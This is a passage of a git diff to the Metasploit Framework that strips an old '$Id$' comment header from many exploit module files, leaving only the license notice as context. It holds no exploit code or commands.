b/modules/exploits/linux/misc/ib_inet_connect.rb index 848dce9c93..babd37b9cf 100644 --- a/modules/exploits/linux/misc/ib_inet_connect.rb +++ b/modules/exploits/linux/misc/ib_inet_connect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb index c126663890..567d95e89b 100644 --- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb +++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb index 501ba4350e..4ede29bbcd 100644 --- a/modules/exploits/linux/misc/ib_open_marker_file.rb +++ b/modules/exploits/linux/misc/ib_open_marker_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb index f4ebe8a5d4..83e8ef86fe 100644 --- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb +++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/lprng_format_string.rb b/modules/exploits/linux/misc/lprng_format_string.rb index 89bf39cafb..0e105034c3 100644 --- a/modules/exploits/linux/misc/lprng_format_string.rb +++ b/modules/exploits/linux/misc/lprng_format_string.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/misc/netsupport_manager_agent.rb b/modules/exploits/linux/misc/netsupport_manager_agent.rb index 164ecf5658..e005fedec7 100644 --- a/modules/exploits/linux/misc/netsupport_manager_agent.rb +++ b/modules/exploits/linux/misc/netsupport_manager_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index fcd1b00bf4..1db722b7b3 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index 15a1e8a9f3..77e5741a09 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index a4f5c54135..38ef7f4e8e 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index bb94e4380c..18e6073b0f 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index 0ea4fd9f5f..efb934d755 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/samba/chain_reply.rb b/modules/exploits/linux/samba/chain_reply.rb index e35da0cbb7..4696a1efd3 100644 --- a/modules/exploits/linux/samba/chain_reply.rb +++ b/modules/exploits/linux/samba/chain_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 4cc64a421e..71c020251c 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb index a141e9a0a5..28b713e735 100644 --- a/modules/exploits/linux/samba/trans2open.rb +++ b/modules/exploits/linux/samba/trans2open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index b6075a2ea3..63892f737c 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 0598e338e6..6f9a27af43 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index a96cbc05a4..337b43f806 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index b14cc13cb6..9fdc45cad0 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index bcd8d6d9c8..1b46303add 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/java_rmi_connection_impl.rb b/modules/exploits/multi/browser/java_rmi_connection_impl.rb index b95eed7af3..e258a9ecf4 100644 --- a/modules/exploits/multi/browser/java_rmi_connection_impl.rb +++ b/modules/exploits/multi/browser/java_rmi_connection_impl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 24440485a4..5877ddac3e 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 53eab16fcc..5825698915 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/java_trusted_chain.rb b/modules/exploits/multi/browser/java_trusted_chain.rb index ab788a628b..160caf0678 100644 --- a/modules/exploits/multi/browser/java_trusted_chain.rb +++ b/modules/exploits/multi/browser/java_trusted_chain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index d47a6df167..bf57ea5d00 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb index 4a3f5e70a3..2fa9337ecc 100644 --- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb +++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index 435f9e5170..1d173ad126 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index bbfb413203..f5b461e90b 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index c44e10294e..60d62d71c0 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb index e8016dd78b..7c532c3dff 100644 --- a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb +++ b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index 3bd31ac05d..215ffd5acf 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/fileformat/peazip_command_injection.rb b/modules/exploits/multi/fileformat/peazip_command_injection.rb index 1ffd0a9d08..27511c48fd 100644 --- a/modules/exploits/multi/fileformat/peazip_command_injection.rb +++ b/modules/exploits/multi/fileformat/peazip_command_injection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index b1ffcfd64d..ef36adf7b7 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 05849ad767..bec2c1ed89 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index 98d42fa3c1..71e2dec71e 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -1,7 +1,3 @@ -## -# $Id$ -### - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index b218e158b7..c0b81a7406 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 0d64c776f4..dee3dfbf6c 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index e027ef90b5..f3f636acfb 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 24be258749..70693a7084 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index 49c9d14a58..32690eb7ce 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index d95b9a5609..7ed607abcf 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index a32a68dfce..f0ca25447a 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb index c4821a3884..9e58133e04 100644 --- a/modules/exploits/multi/http/snortreport_exec.rb +++ b/modules/exploits/multi/http/snortreport_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index cdbaf05c90..6e58b77c77 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index e79edf2c21..05c2b782d6 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index 554a968c4e..fd023e190d 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/sun_jsws_dav_options.rb b/modules/exploits/multi/http/sun_jsws_dav_options.rb index 92cfb0cb18..f8a035e9ac 100644 --- a/modules/exploits/multi/http/sun_jsws_dav_options.rb +++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 1632d1aea5..8703918f99 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index b36472cddb..ab84c42a19 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index 57ffa7ffe7..3eb1090a41 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index 9019442378..660d586be4 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index 23e76348b5..7756e2cb9d 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 2b70955a89..8ee896f9ad 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/misc/zend_java_bridge.rb b/modules/exploits/multi/misc/zend_java_bridge.rb index 8b7712e296..c6353de1a0 100644 --- a/modules/exploits/multi/misc/zend_java_bridge.rb +++ b/modules/exploits/multi/misc/zend_java_bridge.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index 02731224f6..e2e96cb69d 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index b927a91c92..fc47f14eba 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index 19384a2a57..2ee5511237 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index 65441d9bae..d2ee30053a 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/samba/usermap_script.rb b/modules/exploits/multi/samba/usermap_script.rb index 66f1ea5277..e5bdb4f8ce 100644 --- a/modules/exploits/multi/samba/usermap_script.rb +++ b/modules/exploits/multi/samba/usermap_script.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index d8867a4121..1829dd158e 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index ef8adb049d..2006cb0998 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index 2d5bdee165..5d51d6e23a 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb +++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index 9eaa359701..9753a457d6 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index ff8df42198..869cd45b20 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index c4457b56f1..8e3a7d83fd 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index d5c7358070..42fd0bd076 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index 22487578cd..1475ef3e26 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index 8037c600ce..2f2ffacefe 100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index 2fa2978010..d98f8fa656 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index 292e3c800b..a779dc8362 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index 02a9aa5581..d60ba7bc04 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb index acdfb62d9d..dfccfc7b53 100644 --- a/modules/exploits/osx/mdns/upnp_location.rb +++ b/modules/exploits/osx/mdns/upnp_location.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb index a84035435a..0fb5415a19 100644 --- 